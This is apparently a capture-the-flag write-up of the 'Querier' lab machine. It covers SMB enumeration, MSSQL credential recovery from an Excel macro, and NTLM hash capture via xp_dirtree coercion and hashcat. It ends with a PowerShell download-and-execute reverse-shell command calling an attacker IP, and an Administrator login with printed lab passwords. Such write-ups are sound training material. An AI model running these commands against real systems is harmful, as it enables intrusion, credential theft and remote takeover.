Overview
Querier is a Windows machine focused on SMB enumeration, Microsoft SQL Server abuse, NTLM hash capture, and privilege escalation through exposed credentials.
The machine demonstrates how seemingly harmless files stored on SMB shares can lead to full system compromise through credential exposure and lateral movement.
Attack Path Summary
Reconnaissance
↓
Anonymous SMB Access
↓
Excel Document Discovery
↓
MSSQL Credential Recovery
↓
MSSQL Access
↓
NTLM Authentication Capture
↓
Password Cracking
↓
MSSQL Service Account Access
↓
Remote Shell
↓
Credential Discovery
↓
Administrator Access
Reconnaissance
Nmap Scan
Initial enumeration identified a Windows host exposing SMB, MSSQL, and WinRM services.
nmap -sVC -Pn -oA nmap/querier 10.129.38.188
Relevant services:
445/tcp open microsoft-ds
1433/tcp open Microsoft SQL Server 2017
5985/tcp open WinRM
The presence of MSSQL immediately stood out as a potentially valuable attack surface.
SMB Enumeration
Enumerating SMB shares revealed an accessible share named Reports.
smbclient -L //10.129.38.188/
Reports
Anonymous SMB access was allowed on the target.
Accessible shares often contain sensitive documents, configuration files, or embedded credentials.
File Discovery
Browsing the Reports share revealed an Excel spreadsheet.
Currency Volume Report.xlsm
The file was downloaded for further analysis.
Initial Foothold
Macro Analysis
The spreadsheet was inspected using olevba.
olevba Currency\ Volume\ Report.xlsm
The embedded VBA code contained a SQL connection string.
Uid=reporting
Pwd=PcwTWTHRwryjc$c6
Recovered credentials:
reporting:PcwTWTHRwryjc$c6
These credentials appeared to belong to a Microsoft SQL Server account.
MSSQL Access
Using the recovered credentials, authentication to MSSQL was successful.
impacket-mssqlclient QUERIER.HTB/reporting:'PcwTWTHRwryjc$c6'@10.129.38.188 -windows-auth
Although access was obtained, the account lacked sufficient privileges to enable xp_cmdshell.
NTLM Hash Capture
Since direct command execution was unavailable, the MSSQL server was forced to authenticate to an attacker-controlled SMB share.
Responder was started:
sudo responder -I tun0
Then MSSQL was instructed to access a remote share:
xp_dirtree \\10.10.14.62\share
The xp_dirtree procedure can trigger outbound SMB authentication.
When directed toward an attacker-controlled system, NTLM hashes may be captured and cracked offline.
Responder captured an NTLMv2 hash belonging to:
QUERIER\mssql-svc
Cracking the NTLM Hash
The captured hash was cracked using Hashcat.
hashcat -m 5600 mssql-svc.hash /usr/share/wordlists/rockyou.txt
Recovered credentials:
mssql-svc:corporate568
MSSQL Service Account Access
Authenticating with the newly recovered credentials provided significantly higher privileges.
impacket-mssqlclient QUERIER.HTB/mssql-svc:'corporate568'@10.129.38.188 -windows-auth
This account was allowed to execute xp_cmdshell, enabling operating system command execution.
User Flag
xp_cmdshell "powershell type C:\Users\mssql-svc\Desktop\user.txt"
User access was successfully obtained.
Reverse Shell
To gain an interactive shell, a Nishang PowerShell reverse shell was executed.
xp_cmdshell "powershell -c IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.62/Invoke-PowerShellTcp.ps1')"
A reverse shell connected back as:
mssql-svc
Privilege Escalation
PowerUp Enumeration
With interactive access established, PowerUp was used to identify privilege escalation opportunities.
Invoke-WebRequest -Uri "http://10.10.14.62/PowerUp.ps1" -OutFile "PowerUp.ps1"
Enumeration revealed credentials stored on the system.
Administrator:MyUnclesAreMarioAndLuigi!!1!
Credential exposure remains one of the most common privilege escalation vectors on Windows systems.
Automated enumeration tools such as PowerUp can quickly identify these opportunities.
Administrator Access
The recovered credentials were used to authenticate through WinRM.
evil-winrm -u Administrator -p 'MyUnclesAreMarioAndLuigi!!1!' -i 10.129.38.188
Administrative access was successfully obtained.
Root Flag
type C:\Users\Administrator\Desktop\root.txt
The machine was fully compromised.
Skills & Concepts
- SMB Enumeration
- Excel Macro Analysis
- MSSQL Enumeration
- NTLM Hash Capture
- Responder Usage
- Password Cracking
- MSSQL Abuse
- Reverse Shells
- Windows Privilege Escalation
Tools Used
- Nmap
- SMBClient
- Olevba
- Impacket
- Responder
- Hashcat
- Nishang
- PowerUp
- Evil-WinRM
Lessons Learned
Querier demonstrates how sensitive information stored in shared documents can lead directly to system compromise.
Key takeaways include:
- Enumerating SMB shares thoroughly
- Inspecting Office documents for embedded credentials
- Leveraging MSSQL functionality for authentication coercion
- Capturing and cracking NTLM hashes
- Using MSSQL for command execution
- Enumerating Windows privilege escalation opportunities
- Identifying exposed credentials on compromised systems
The machine also highlights the dangers of credential reuse and insecure storage of administrative passwords.